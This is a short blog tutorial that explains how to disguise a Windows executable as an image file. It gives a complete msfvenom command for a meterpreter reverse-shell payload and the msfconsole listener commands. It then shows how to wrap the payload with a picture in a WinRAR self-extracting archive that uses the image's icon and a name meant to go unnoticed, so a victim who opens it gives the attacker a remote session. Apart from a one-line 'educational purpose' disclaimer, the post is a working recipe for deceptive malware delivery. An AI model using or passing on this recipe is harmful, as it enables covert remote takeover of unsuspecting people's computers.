Creating Payload with Images

Mr. Torjan Captain
4 min readFeb 19


It’s less the trouble you imagined.

Image by Macrovector

Just like not all payloads are same, creating a payload via an image is also not the same.

Note: This is strictly for educational purpose only. Do not try to break into any other machine which you are not authorized to.


  1. Idea on what a payload is and how it works.
  2. Linux machine(Any flavor)
  3. Windows machine(Target and working machine)
  4. WinRAR
  5. An image

Step 1: Generating the executable payload.

Hop on to your linux machine(I am using Kali) and open a terminal. You can get your IP address by trying “ifconfig” or “ip a”.

Finding the IP address

To create our payload we will require Msfvenom. Type-in the following command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe -o /home/kali/Desktop/testviruse.exe

Make sure to change the “LHOST” value to your IP. You can change your port or leave it as default.

While on terminal, you can also start your listener. We will use msfconsole.

In the terminal give the following commands :

msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
set exitonsession false
exploit -j

Make sure to change the LHOST and LORT according to your PC details.

Step 2: Making an Icon

Download an image. I got this:

Original Image

Copy the payload created form your Linux machine to your windows machine.

We will now make an icon of our image. You can use any tool/site preferred. I would suggest:

Chose the original image and convert.

ICO Converter to convert image to an icon
The icon downloaded

Step 3: Assembling the payload with the image

Select the payload(.exe file) and the image file(Original Image, not the icon). Right clcik on it and select “Add to archive…” option.

Add to archive

Under the System tab, give a name that can easily fit it and cannot be noticed. Under Archiving options, select Create SFX archive. If you have a size limitation, you can also chose the Compression method as Best. Select the Advanced option.

Archiving with WinRAR

Select the SFX options.

In the Update tab, under Update mode, select Extract and update files. And under Overwrite mode, select Overwrite all files. Then select the Setup tab.

Give the names of your payload and the original image file archived. The program will set the execution order as mentioned here. So, the payload(testvirus.exe) will run first followed by the image(original.jfif). Click on Test and icon tab.

Attach the generated icon under Load SFX icon from the file option.

Click on ok….and your executable image is ready.

Executable image generated

Step 4: Executing the payload

Now when the victim clicks on the icon, it starts the payload and then opens the actual image. This gives us a session in our Meterpreter, and we are in :)

Meterpreter session

That’s all for the post. Happy Hacking!



Mr. Torjan Captain

A security enthusiast making way into the future. Your neighborhood cyberguy.